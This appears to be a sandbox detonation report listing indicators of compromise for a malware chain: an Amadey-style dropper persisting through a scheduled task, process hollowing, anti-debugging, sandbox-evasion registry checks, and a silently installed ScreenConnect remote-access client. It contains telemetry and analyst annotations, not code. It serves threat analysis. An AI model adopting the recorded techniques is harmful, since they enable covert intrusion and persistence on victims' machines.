Suspicious use of NtSetInformationThreadHideFromDebugger (17 IoCs)
pid  Process
  2140 1V40F8.exe; 556 skotes.exe; 2332 2q4507.exe; 1412 3Z30a.exe; 2336 4C806m.exe; 7384 9a1c193d0b.exe; 5704 skotes.exe; 6380 002e33e6e2.exe; 5960 4320ee3d91.exe; 7872 7d3ca92efa.exe; 7036 70a82b2704.exe; 1996 cedb729c19.exe; 6360 c1de1e1e88.exe; 5620 skotes.exe; 7284 b7a1e2f349.exe; 9456 3dbe003be11c428091b74912c836eb73.exe (x2)

Suspicious use of SetThreadContext (5 IoCs)
description  pid  Process  procid_target
  PID 1704 set thread context of 400   1704  kz8ZdyP.exe  141
  PID 4224 set thread context of 7652  4224  57dcd7e51c.exe  161
  PID 8680 set thread context of 7720  8680  e200e74b60.exe  265
  PID 1952 set thread context of 8080  1952  fd4b71514b.exe  270
  PID 7800 set thread context of 5848  7800  Intel_PTT_EK_Recertification.exe  273
Four of the five targets are fresh copies of the injecting image (400 kz8ZdyP.exe, 7652 57dcd7e51c.exe, 7720 e200e74b60.exe, 8080 fd4b71514b.exe), the spawn-self-then-SetThreadContext pattern consistent with process hollowing; PID 5848 does not appear in the dropped-EXE list.

UPX packed file (2 IoCs)
resource  yara_rule
  behavioral1/memory/8124-4951-0x00007FF6D7900000-0x00007FF6D7D90000-memory.dmp  upx
  behavioral1/memory/8124-4966-0x00007FF6D7900000-0x00007FF6D7D90000-memory.dmp  upx
PID 8124 is in.exe.
Drops file in Program Files directory (19 IoCs)
All 19 files are created by msiexec.exe under C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\:
  ScreenConnect.Core.dll, ScreenConnect.WindowsFileManager.exe, Client.en-US.resources, Client.resources, system.config, ScreenConnect.Windows.dll, ScreenConnect.WindowsAuthenticationPackage.dll, ScreenConnect.WindowsCredentialProvider.dll, Client.Override.resources, app.config, Client.Override.en-US.resources, ScreenConnect.Client.dll, ScreenConnect.ClientService.dll, ScreenConnect.WindowsBackstageShell.exe.config, ScreenConnect.WindowsClient.exe, ScreenConnect.WindowsFileManager.exe.config, ScreenConnect.ClientService.exe, ScreenConnect.WindowsBackstageShell.exe, ScreenConnect.WindowsClient.exe.config

Drops file in Windows directory (14 IoCs)
description  ioc  Process
  File opened for modification  C:\Windows\Installer\  msiexec.exe
  File created  C:\Windows\Installer\wix{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}.SchedServiceConfig.rmi  MsiExec.exe
  File created  C:\Windows\Installer\e588be2.msi  msiexec.exe
  File opened for modification  C:\Windows\Installer\e588be0.msi  msiexec.exe
  File created  C:\Windows\Installer\inprogressinstallinfo.ipi  msiexec.exe
  File created  C:\Windows\Installer\SourceHash{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI8DD4.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI8E71.tmp  msiexec.exe
  File created  C:\Windows\Tasks\skotes.job  1V40F8.exe
  File created  C:\Windows\Installer\e588be0.msi  msiexec.exe
  File opened for modification  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI9008.tmp  msiexec.exe
  File created  C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon  msiexec.exe
  File opened for modification  C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon  msiexec.exe
The one record that is not Windows Installer bookkeeping for the ScreenConnect MSI (product code {5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}) is C:\Windows\Tasks\skotes.job, written by the Amadey dropper 1V40F8.exe: the scheduled task that keeps its install_file skotes.exe running.
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Program crash (2 IoCs)
pid  pid_target  Process  procid_target
  8932  7036  WerFault.exe  253   (7036 is 70a82b2704.exe)
  3896  7284  WerFault.exe  269   (7284 is b7a1e2f349.exe)
System Location Discovery: System Language Discovery (1 TTP, 59 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (57 records) by: powershell.exe (x6), taskkill.exe (x5), MsiExec.exe (x3), cmd.exe (x2), timeout.exe (x2), fire.exe (x2), e200e74b60.exe (x2), fd4b71514b.exe (x2), 57dcd7e51c.exe (x2), kz8ZdyP.exe (x2), bbfa9a48763748409ab9f84a4b4d1cca.exe, 00f883d031.exe, 7d3ca92efa.exe, 4C806m.exe, rundll32.exe, skotes.exe, ScreenConnect.ClientService.exe, NN9Dd7c.exe, 64711675d3.exe, cfb5c42bfd.exe, ga70pjP.exe, 9a1c193d0b.exe, svchost.exe, 3dbe003be11c428091b74912c836eb73.exe, 4320ee3d91.exe, c1de1e1e88.exe, 1048c089ab.exe, 3Z30a.exe, 595994f5cc9c4c769929b462827bc67e.exe, 70a82b2704.exe, msiexec.exe, p6D27.exe, 002e33e6e2.exe, 2q4507.exe, cedb729c19.exe, 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe, R5B56.exe, b7a1e2f349.exe, 1V40F8.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language  64711675d3.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage  64711675d3.exe
Opening NLS\Language is emitted by nearly every process in the run, system binaries such as cmd.exe, taskkill.exe, timeout.exe and svchost.exe included, so on its own it is locale initialisation rather than an indicator. The one process that actually reads InstallLanguage, 64711675d3.exe, is the only record here that looks like a deliberate language check.
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process
1116 PING.EXE
5672 powershell.exe
6028 PING.EXE
2080 powershell.exe
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 vssvc.exe
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 595994f5cc9c4c769929b462827bc67e.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bbfa9a48763748409ab9f84a4b4d1cca.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 595994f5cc9c4c769929b462827bc67e.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bbfa9a48763748409ab9f84a4b4d1cca.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe
Delays execution with timeout.exe 2 IoCs
pid Process
2652 timeout.exe
4884 timeout.exe
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Kills process with taskkill 5 IoCs
pid Process
5756 taskkill.exe
3564 taskkill.exe
6488 taskkill.exe
6748 taskkill.exe
6744 taskkill.exe
Modifies data under HKEY_USERS 18 IoCs
description ioc Process
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe
Modifies registry class 39 IoCs
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\UseOriginalUrlEncoding = "1" msiexec.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\URL Protocol msiexec.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\ = "ScreenConnect Client (98a59bd0eed9222b) Credential Provider" msiexec.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductName = "ScreenConnect Client (98a59bd0eed9222b)" msiexec.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Version = "402849799" msiexec.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductIcon = "C:\\Windows\\Installer\\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\\DefaultIcon" msiexec.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media msiexec.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b msiexec.exe
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings ScreenConnect.WindowsClient.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media\1 = ";" msiexec.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C} msiexec.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList msiexec.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe
Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b msiexec.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC\Full msiexec.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AuthorizedLUAApp = "0" msiexec.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net msiexec.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell msiexec.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2 msiexec.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Clients = 3a0000000000 msiexec.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open msiexec.exe
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32 msiexec.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\InstanceType = "0" msiexec.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\DeploymentFlags = "3" msiexec.exe
Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\PackageCode = "D32D1EE57AD9200EF07A7D4C08AB00DC" msiexec.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Assignment = "1" msiexec.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AdvertiseFlags = "388" msiexec.exe
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings firefox.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Language = "1033" msiexec.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe
Runs ping.exe 1 TTPs 2 IoCs
pid Process
6028 PING.EXE
1116 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
6580 schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process
2140 1V40F8.exe 2140 1V40F8.exe 556 skotes.exe 556 skotes.exe 2332 2q4507.exe 2332 2q4507.exe 1412 3Z30a.exe 1412 3Z30a.exe 2336 4C806m.exe 2336 4C806m.exe 2284 NN9Dd7c.exe 2336 4C806m.exe 2336 4C806m.exe 3144 powershell.exe 3144 powershell.exe 3144 powershell.exe 3388 powershell.exe 3388 powershell.exe 3388 powershell.exe 4528 595994f5cc9c4c769929b462827bc67e.exe 4528 595994f5cc9c4c769929b462827bc67e.exe 2820 msedge.exe 2820 msedge.exe 2416 msedge.exe 2416 msedge.exe 1704 kz8ZdyP.exe 1704 kz8ZdyP.exe 400 kz8ZdyP.exe 400 kz8ZdyP.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 4904 msiexec.exe 4904 msiexec.exe 6152 identity_helper.exe 6152 identity_helper.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 7652 57dcd7e51c.exe 7652 57dcd7e51c.exe 5704 skotes.exe 5704 skotes.exe 5672 powershell.exe 5672 powershell.exe 5672 powershell.exe 6380 002e33e6e2.exe 6380 002e33e6e2.exe 5960 4320ee3d91.exe 5960 4320ee3d91.exe 5676 64711675d3.exe 5676 64711675d3.exe 7872 7d3ca92efa.exe 7872 7d3ca92efa.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
pid Process
2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process
Token: SeDebugPrivilege 2284 NN9Dd7c.exe
Token: SeDebugPrivilege 2336 4C806m.exe
Token: SeDebugPrivilege 3144 powershell.exe
Token: SeDebugPrivilege 2012 ga70pjP.exe
Token: SeShutdownPrivilege 3744 msiexec.exe
Token: SeIncreaseQuotaPrivilege 3744 msiexec.exe
Token: SeSecurityPrivilege 4904 msiexec.exe
Token: SeCreateTokenPrivilege 3744 msiexec.exe
Token: SeAssignPrimaryTokenPrivilege 3744 msiexec.exe
Token: SeLockMemoryPrivilege 3744 msiexec.exe
Token: SeIncreaseQuotaPrivilege 3744 msiexec.exe
Token: SeMachineAccountPrivilege 3744 msiexec.exe
Token: SeTcbPrivilege 3744 msiexec.exe
Token: SeSecurityPrivilege 3744 msiexec.exe
Token: SeTakeOwnershipPrivilege 3744 msiexec.exe
Token: SeLoadDriverPrivilege 3744 msiexec.exe
Token: SeSystemProfilePrivilege 3744 msiexec.exe
Token: SeSystemtimePrivilege 3744 msiexec.exe
Token: SeProfSingleProcessPrivilege 3744 msiexec.exe
Token: SeIncBasePriorityPrivilege 3744 msiexec.exe
Token: SeCreatePagefilePrivilege 3744 msiexec.exe
Token: SeCreatePermanentPrivilege 3744 msiexec.exe
Token: SeBackupPrivilege 3744 msiexec.exe
Token: SeRestorePrivilege 3744 msiexec.exe
Token: SeShutdownPrivilege 3744 msiexec.exe
Token: SeDebugPrivilege 3744 msiexec.exe
Token: SeAuditPrivilege 3744 msiexec.exe
Token: SeSystemEnvironmentPrivilege 3744 msiexec.exe
Token: SeChangeNotifyPrivilege 3744 msiexec.exe
Token: SeRemoteShutdownPrivilege 3744 msiexec.exe
Token: SeUndockPrivilege 3744 msiexec.exe
Token: SeSyncAgentPrivilege 3744 msiexec.exe
Token: SeEnableDelegationPrivilege 3744 msiexec.exe
Token: SeManageVolumePrivilege 3744 msiexec.exe
Token: SeImpersonatePrivilege 3744 msiexec.exe
Token: SeCreateGlobalPrivilege 3744 msiexec.exe
Token: SeDebugPrivilege 3388 powershell.exe
Token: SeCreateTokenPrivilege 3744 msiexec.exe
Token: SeAssignPrimaryTokenPrivilege 3744 msiexec.exe
Token: SeLockMemoryPrivilege 3744 msiexec.exe
Token: SeIncreaseQuotaPrivilege 3744 msiexec.exe
Token: SeMachineAccountPrivilege 3744 msiexec.exe
Token: SeTcbPrivilege 3744 msiexec.exe
Token: SeSecurityPrivilege 3744 msiexec.exe
Token: SeTakeOwnershipPrivilege 3744 msiexec.exe
Token: SeLoadDriverPrivilege 3744 msiexec.exe
Token: SeSystemProfilePrivilege 3744 msiexec.exe
Token: SeSystemtimePrivilege 3744 msiexec.exe
Token: SeProfSingleProcessPrivilege 3744 msiexec.exe
Token: SeIncBasePriorityPrivilege 3744 msiexec.exe
Token: SeCreatePagefilePrivilege 3744 msiexec.exe
Token: SeCreatePermanentPrivilege 3744 msiexec.exe
Token: SeBackupPrivilege 3744 msiexec.exe
Token: SeRestorePrivilege 3744 msiexec.exe
Token: SeShutdownPrivilege 3744 msiexec.exe
Token: SeDebugPrivilege 3744 msiexec.exe
Token: SeAuditPrivilege 3744 msiexec.exe
Token: SeSystemEnvironmentPrivilege 3744 msiexec.exe
Token: SeChangeNotifyPrivilege 3744 msiexec.exe
Token: SeRemoteShutdownPrivilege 3744 msiexec.exe
Token: SeUndockPrivilege 3744 msiexec.exe
Token: SeSyncAgentPrivilege 3744 msiexec.exe
Token: SeEnableDelegationPrivilege 3744 msiexec.exe
Token: SeManageVolumePrivilege 3744 msiexec.exe
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process
2140 1V40F8.exe 3744 msiexec.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 3744 msiexec.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe
Suspicious use of SendNotifyMessage 64 IoCs
pid Process
2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process
6856 firefox.exe
9456 3dbe003be11c428091b74912c836eb73.exe
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target (repeat counts give the number of identical events recorded)
PID 3888 wrote to memory of 3952  3888 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe  83  (3 events)
PID 3952 wrote to memory of 2356  3952 p6D27.exe  84  (3 events)
PID 2356 wrote to memory of 2140  2356 R5B56.exe  85  (3 events)
PID 2140 wrote to memory of 556  2140 1V40F8.exe  86  (3 events)
PID 2356 wrote to memory of 2332  2356 R5B56.exe  87  (3 events)
PID 3952 wrote to memory of 1412  3952 p6D27.exe  95  (3 events)
PID 556 wrote to memory of 1704  556 skotes.exe  96  (3 events)
PID 3888 wrote to memory of 2336  3888 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe  97  (3 events)
PID 556 wrote to memory of 2284  556 skotes.exe  100  (3 events)
PID 2284 wrote to memory of 3144  2284 NN9Dd7c.exe  102  (3 events)
PID 556 wrote to memory of 2012  556 skotes.exe  107  (3 events)
PID 2012 wrote to memory of 3744  2012 ga70pjP.exe  108  (3 events)
PID 2284 wrote to memory of 3388  2284 NN9Dd7c.exe  111  (3 events)
PID 4904 wrote to memory of 1292  4904 msiexec.exe  114  (3 events)
PID 1292 wrote to memory of 2832  1292 MsiExec.exe  115  (3 events)
